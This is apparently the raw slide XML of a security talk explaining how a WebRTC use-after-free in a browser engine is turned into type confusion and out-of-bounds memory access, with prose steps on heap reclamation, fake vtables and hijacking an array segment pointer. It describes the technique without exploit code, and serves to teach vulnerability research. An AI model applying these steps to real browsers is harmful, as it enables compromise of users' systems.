              <a:t>There is also a function at Fake_vtable+0x08 that can be called by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>RegisterTrackingClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="SimHei" charset="-122"/>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4747E86B-11F4-4BED-B965-669E4D038342}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079903" y="5584455"/>
            <a:ext cx="10961571" cy="1928208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74EFBA4-48E8-4EFF-8FA9-5862EE6B3309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068231" y="5051961"/>
            <a:ext cx="10953454" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>And this method does not produce any side effects</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7922FA25-4D7D-418A-97FF-21A8D1B582D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079902" y="2550360"/>
            <a:ext cx="10441961" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>RegisterTrackingClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> function at Fake_vtable+0x88 can be called by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>OP_GetProperty</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E384FE41-6163-4589-B2C4-930B8264DF0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079903" y="4547054"/>
            <a:ext cx="10961572" cy="401609"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1563876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WebRTC Parameters UAF Exploitation: From Type Confusion to Memory Out of Bounds</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34E7CE11-D78D-4559-BC33-6A036BF81130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2492554"/>
            <a:ext cx="10953455" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to use the "(fakeobj+0x68) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fakeobj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B511BAD-CD26-463A-BE36-8D96ABCDEC5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="4979178"/>
            <a:ext cx="7278475" cy="1742091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4902FDD-0490-4B95-B6A5-9C378CDCA59D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090375" y="2972794"/>
            <a:ext cx="7266225" cy="1962610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE21BE6A-702B-42A0-BCB6-437E2A2C8FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1078125" y="4505325"/>
            <a:ext cx="1922250" cy="20569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21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4885DE06-67FD-4838-A14B-930AAD1E7A52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5777018" y="5850223"/>
            <a:ext cx="2579581" cy="20569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0" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D5EB86-4B47-4E98-871A-9B9D1C20CF67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="730475" y="7077922"/>
            <a:ext cx="2642050" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Fake object start position</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="SimHei" charset="-122"/>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="矩形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DBD7718-D41C-47FC-B40A-E7D2FDCB53F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1090375" y="5402162"/>
            <a:ext cx="1922250" cy="20569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7E24BADF-84ED-4079-B696-EAB19AA0478E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1078125" y="3182525"/>
            <a:ext cx="1922250" cy="20569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A56A6E57-24A3-43CD-B3A7-D44520225EBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4432863" y="4467225"/>
            <a:ext cx="2552138" cy="225490"/>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129512F5-5F30-47F3-B5CC-7417A80782AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3110611" y="6906077"/>
            <a:ext cx="5572564" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modify the fake object into a segment with a large size and length, so that an integer array will have the ability to read and write out of bound.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="矩形 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC3155C1-F973-4CDB-8167-24966DFDADF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="8195839"/>
            <a:ext cx="10953455" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By adjusting the position of the fake object in the data portion of the integer array, the position of the fake object +0x68 can be exactly the Segment head pointer of the next array object, thereby pointing the Segment head to the area we can fully control.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="连接符: 肘形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C106F078-7C29-46F6-91B9-D80990D28685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="1"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="730475" y="4608171"/>
            <a:ext cx="347650" cy="2823695"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65756"/>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952498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Exploitation : Exploitation Summary</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN"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25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B67277-6D6F-45C6-BE9C-8A07F8020EAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078126" y="2550693"/>
            <a:ext cx="10953454" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The steps of the WebRTC Parameters UAF vulnerability from UAF to type confusion to memory out of bounds are as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50607B95-C365-422A-836D-AD8C4201F440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="493486" y="2950802"/>
            <a:ext cx="11028378" cy="7732420"/>
            <a:chOff x="887117" y="3897275"/>
            <a:chExt cx="24112703" cy="9832356"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="矩形 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63F4B2B-BD9C-4C3B-A118-237E5CA74360}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1740144" y="4562564"/>
              <a:ext cx="5080176" cy="2280494"/>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spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Create an array of objects containing a number and size of dictionary structure objects</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="矩形 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED7A608-6408-487C-885D-F263AB99817E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7649889" y="4453776"/>
              <a:ext cx="3661924" cy="2389283"/>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pPr lvl="0" defTabSz="914400">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Set a getter callback on a subscript of an object array</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="直接箭头连接符 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49F819FC-B473-488E-A16D-5D169AF05823}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="29" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6820320" y="5695699"/>
              <a:ext cx="907068" cy="7113"/>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2" name="矩形 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0372871-DFB5-4C24-A72E-46A9ECE39926}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12822155" y="4039330"/>
              <a:ext cx="4066251" cy="2894803"/>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r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Call </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>setRemoteCandidates</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> to pass in an array of dictionary objects</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="直接箭头连接符 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17804114-D956-4FBA-82A1-C1B42B1E1D31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="11311811" y="5695697"/>
              <a:ext cx="1510344" cy="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4" name="矩形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5954E76C-3585-4C13-924A-004A89458C96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="18398750" y="3897275"/>
              <a:ext cx="4778489" cy="2945781"/>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r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>The callback function is called, releasing all elements in the object array, triggering the vulnerability</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="直接箭头连接符 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECBF4F2-AFA7-414D-AF35-BBFA8F9A8226}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="16888407" y="5523721"/>
              <a:ext cx="1510345" cy="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38" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74320397-20F5-4C7A-9943-6876D4B1EDE9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2591054" y="7344716"/>
              <a:ext cx="5136335" cy="3180496"/>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pPr lvl="0" defTabSz="914400">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Call garbage collection, allocate a certain number and size of integer array objects to occupy</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="39" name="直接箭头连接符 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F37C3D-85E8-4D7B-A535-F8C7D0281145}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="38" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="887117" y="8934965"/>
              <a:ext cx="1703937"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1" name="矩形 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7984F61F-5B8B-462D-BFE5-97EBBE128420}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8887968" y="7076186"/>
              <a:ext cx="6981818" cy="391316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pPr lvl="0" defTabSz="914400">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>fake an object at a specific location in the data area of each integer array object. The virtual table and type of the fake object comes from the module base address leaked from another vulnerability.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="直接箭头连接符 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54DDD11C-8422-4477-9160-6F96694E7B78}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7727389" y="8876493"/>
              <a:ext cx="1160580"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4" name="矩形 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
